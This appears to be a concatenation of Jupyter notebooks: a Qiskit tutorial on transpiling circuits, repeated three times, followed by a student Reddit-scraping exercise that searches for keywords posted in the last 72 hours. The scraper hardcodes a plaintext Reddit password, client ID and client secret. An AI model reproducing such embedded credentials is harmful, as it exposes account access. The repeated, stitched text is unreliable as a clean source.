We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cp(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw()
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-phase with lambda=pi/4
qc_basis.p(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw()
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.p(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.p(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.p(np.pi/4, qr[1])
qc_basis.p(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.p(np.pi/4, qr[2])
qc_basis.p(np.pi/4, qr[0])
qc_basis.p(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw()
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____
###Markdown
Transpiling Quantum Circuits In this chapter we will investigate how quantum circuits are transformed when run on quantum devices. That we need to modify the circuits at all is a consequence of the limitations of current quantum computing hardware. Namely, the limited connectivity inherent in most quantum hardware, restricted gate sets, as well as environmental noise and gate errors, all conspire to limit the effective computational power on today's quantum devices. Fortunately, quantum circuit rewriting tool chains have been developed that directly address these issues, and return heavily optimized circuits mapped to targeted quantum devices. Here we will explore the IBM Qiskit 'transpiler' circuit rewriting framework.
###Code
import numpy as np
from qiskit import *
from qiskit.tools.jupyter import *
from qiskit.providers.ibmq import least_busy
%matplotlib inline
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
IBMQ.load_account()
###Output
_____no_output_____
###Markdown
Core Steps in Circuit Rewriting As we will see, rewriting quantum circuits to match hardware constraints and optimize for performance can be far from trivial. The flow of logic in the rewriting tool chain need not be linear, and can often have iterative sub-loops, conditional branches, and other complex behaviors. That being said, the basic building blocks follow the structure given below.  Our goal in this section is to see what each of these "passes" does at a high-level, and then begin exploring their usage on a set of common circuits. Unrolling to Basis Gates When writing a quantum circuit you are free to use any quantum gate (unitary operator) that you like, along with a collection of non-gate operations such as qubit measurements and reset operations. However, when running a circuit on a real quantum device one no longer has this flexibility. Due to limitations in, for example, the physical interactions between qubits, difficulty in implementing multi-qubit gates, control electronics etc, a quantum computing device can only natively support a handful of quantum gates and non-gate operations. In the present case of IBM Q devices, the native gate set can be found by querying the devices themselves:
###Code
provider = IBMQ.get_provider(group='open')
provider.backends(simulator=False)
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 5 and not x.configuration().simulator and x.status().operational==True))
backend.configuration().basis_gates
###Output
_____no_output_____
###Markdown
We see that the our device supports five native gates: three single-qubit gates (`u1`, `u2`, `u3`, and `id`) and one two-qubit entangling gate `cx`. In addition, the device supports qubit measurements (otherwise we can not read out an answer!). Although we have queried only a single device, all IBM Q devices support this gate set.The `u*` gates represent arbitrary single-qubit rotations of one, two, and three angles. The `u1` gates are single-parameter rotations that represent generalized phase gates of the form$$U_{1}(\lambda) = \begin{bmatrix}1 & 0 \\0 & e^{i\lambda}\end{bmatrix}$$This set includes common gates such as $Z$, $T$, $T^{\dagger}$, $S$, and $S^{\dagger}$. It turns out that these gates do not actually need to be performed on hardware, but instead, can be implemented in software as "virtual gates". These virtual gates are called "frame changes" and take zero time, and have no associated error; they are free gates on hardware.Two-angle rotations, $U_{2}(\phi,\lambda)$, are actually two frame changes with a single $X_{\pi/2}$ gate in between them, and can be used to synthesize gates like the Hadamard ($U_{2}(0,\pi)$) gate. As the only actual gate performed is the $X_{\pi/2}$ gate, the error and gate time associated with any $U_{2}$ gate is the same as an $X_{\pi/2}$ gate. Similarly, $U_{3}(\theta,\phi,\lambda)$ gates are formed from three frame changes with two $X_{\pi/2}$ gates in between them. The errors and gate times are twice those of a single $X_{\pi/2}$. The identity gate, $id$, is straightforward, and is a placeholder gate with a fixed time-interval. The only entangling gate supported by the IBM Q devices is the CNOT gate (`cx`) that, in the computational basis, can be written as:$$\mathrm{CNOT}(0,1) = \begin{bmatrix}1 & 0 & 0 & 0 \\0 & 0 & 0 & 1 \\0 & 0 & 1 & 0 \\0 & 1 & 0 & 0\end{bmatrix}$$,where we see that the matrix form follows from the specific bit-ordering convention used in Qiskit. Every quantum circuit run on a IBM Q device must be expressed using only these basis gates. For example, suppose one wants to run a simple phase estimation circuit:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.x(qr[1])
qc.cu1(np.pi/4, qr[0], qr[1])
qc.h(qr[0])
qc.measure(qr[0], cr[0])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
We have $H$, $X$, and controlled-$U_{1}$ gates, all of which are not in our devices basis gate set, and must be expanded. We will see that this expansion is taken care of for you, but for now let us just rewrite the circuit in the basis gate set:
###Code
qr = QuantumRegister(2, 'q')
cr = ClassicalRegister(1, 'c')
qc_basis = QuantumCircuit(qr, cr)
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
# X gate in U3 format
qc_basis.u3(np.pi, 0, np.pi, qr[1])
# Decomposition for controlled-U1 with lambda=pi/4
qc_basis.u1(np.pi/8, qr[0])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(-np.pi/8, qr[1])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/8, qr[1])
# Hadamard in U2 format
qc_basis.u2(0, np.pi, qr[0])
qc_basis.measure(qr[0], cr[0])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
A few things to highlight. One, the circuit has gotten longer with respect to the initial one. This can be verified by checking the depth of the circuits:
###Code
print(qc.depth(), ',', qc_basis.depth())
###Output
4 , 7
###Markdown
Second, although we had a single controlled gate, the fact that it was not in the basis set means that, when expanded, it requires more than a single `cx` gate to implement. All said, unrolling to the basis set of gates leads to an increase in the length of a quantum circuit and the number of gates. Both of these increases lead to more errors from the environment and gate errors, respectively, and further circuit rewriting steps must try to mitigate this effect through circuit optimizations. Finally, we will look at the particularly important example of a Toffoli, or controlled-controlled-not gate:
###Code
qr = QuantumRegister(3, 'q')
qc = QuantumCircuit(qr)
qc.ccx(qr[0], qr[1], qr[2])
qc.draw(output='mpl')
###Output
_____no_output_____
###Markdown
As a three-qubit gate, it should already be clear that this is not in the basis set of our devices. We have already seen that controlled gates not in the basis set are typically decomposed into multiple CNOT gates. This is doubly true for controlled gates with more than two qubits, where multiple CNOT gates are needed to implement the entangling across the multiple qubits. In our basis set, the Toffoli gate can be written as:
###Code
qr = QuantumRegister(3, 'q')
qc_basis = QuantumCircuit(qr)
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.cx(qr[1], qr[2])
qc_basis.u1(np.pi/4, qr[1])
qc_basis.u1(-np.pi/4, qr[2])
qc_basis.cx(qr[0], qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.u1(np.pi/4, qr[2])
qc_basis.u1(np.pi/4, qr[0])
qc_basis.u1(-np.pi/4, qr[1])
qc_basis.u2(0,np.pi, qr[2])
qc_basis.cx(qr[0], qr[1])
qc_basis.draw(output='mpl')
###Output
_____no_output_____
###Markdown
Therefore, for every Toffoli gate in a quantum circuit, the IBM Q hardware must execute six CNOT gates, and a handful of single-qubit gates. From this example, it should be clear that any algorithm that makes use of multiple Toffoli gates will end up as a circuit with large depth and with therefore be appreciably affected by noise and gate errors. Initial Layout
###Code
qr = QuantumRegister(5, 'q')
cr = ClassicalRegister(5, 'c')
qc = QuantumCircuit(qr, cr)
qc.h(qr[0])
qc.cx(qr[0], qr[4])
qc.cx(qr[4], qr[3])
qc.cx(qr[3], qr[1])
qc.cx(qr[1], qr[2])
qc.draw(output='mpl')
from qiskit.visualization.gate_map import plot_gate_map
plot_gate_map(backend, plot_directed=True)
import qiskit
qiskit.__qiskit_version__
###Output
_____no_output_____ |
Modone.ipynb | ###Markdown
The FBI is tracking on a potential smuggling ring that is led by a shady character known by his nom de guerre of The Hamburgler and is using social media platforms to help organize her or his efforts. Your mission, should you choose to accept it, is to create a system that uses the API of various services to trace comments made over the last 72 hours that make mention of the terms that he is using as cover: cheese (payments), pickles (firearms), buns (identity covers), meat (targets), and sesame (keys). We need your help tracking this person and associates who may use these terms on social media. Write a Python script that draws data from a subreddit (or from multiple subreddits, or from all subreddits) and stores it as a CSV.Think about the kinds of questions you might be able to address using data from Reddit. I was looking at /r/Phoenix because I wanted to extract place-based comments and learn from them. Here you are looking for particular keywords, within a particular timeframe. Design an extractor that does this, and also saves the dates and times of these comments to a human-readable version. It should also only collect the last 72 hours-worth of data.
###Code
!pip install praw
!pip install pytz # suggested to use because kept getting tzinfo error when importing datetime. this will specify pacific timezone
import praw
import time
from time import sleep # importing to slow down execution
import datetime
from datetime import datetime
from datetime import timedelta
from praw.reddit import Submission # colab suggested this
from praw.models.reddit.comment import Comment # colab suggested this
###Output
_____no_output_____
###Markdown
2. enter login and script info for reddit
###Code
usr_name = "nunya_9911"
usr_password = "disposablepassword123!"
reddit_app_id = '0Fss0e88a5UL1dWmgk2vug'
reddit_app_secret = 'AmCxyt0gEFlMe6r2TDs6ILzQfZI5Eg'
reddit = praw.Reddit(user_agent="Mod 1 (by u/nunya_9911)",
client_id=reddit_app_id, client_secret=reddit_app_secret,
# added the check for async as colab suggested I do so.
username=usr_name, password=usr_password,check_for_async=False)
# defines which subreddit we will be looking in. No preference so to subreddit so put 'all'
subreddit = reddit.subreddit('all')
###Output
_____no_output_____
###Markdown
**This is an explanation of how to use search.** It is copied from the floating comment when I began to type "search". I put it here so it was easy to reference while I was typing everything out.def search(query: str, sort: str='relevance', syntax: str='lucene', time_filter: str='all', **generator_kwargs: Any) ->Iterator['praw.models.Submission']Return a .ListingGenerator for items that match query.:param query: The query string to search for.:param sort: Can be one of: relevance, hot, top, new, comments. (default: relevance).:param syntax: Can be one of: cloudsearch, lucene, plain (default: lucene).:param time_filter: Can be one of: all, day, hour, month, week, year (default: all).For more information on building a search query see:https://www.reddit.com/wiki/searchFor example, to search all subreddits for praw try:
###Code
# this labels the current date so I can use it later
rightnow = datetime.now()
# per the reading about time. the reading said to enter datetime.datetime.timedelta, but that didn't work.
# did this instead. not sure if Python updated since the reading was published?
delta = timedelta(hours=72)
# this defines the time 3 days ago and converts it from datetime.datetime to a float
the_last_seventytwo_hours = datetime.timestamp(rightnow - delta)
with open("moduleone_missionhamburgler.csv", 'w') as subfile:
# creating an empty list so I can add things to it
list_of_found_codenames = []
# so reddit doesn't get mad at me
sleep(2)
# in all subreddits, I am searching for submissions that includes the Hamburgler's cover names
for submission in subreddit.search("cheese, bun, meat, pickle, sesame",'new','lucene','week'):
# while completing the for loop above, it is going to make sure the submissions were made in the last 3 days
if submission.created_utc >= the_last_seventytwo_hours:
sleep(4)
# adding the submissions from the for loop to the list
list_of_found_codenames.append(submission.id)
sleep(4)
# this for loop will help format the submissions I added to the list
for eachtopic in list_of_found_codenames:
submission = reddit.submission(eachtopic)
# making sure reddit doesn't get mad. better safe than sorry :)
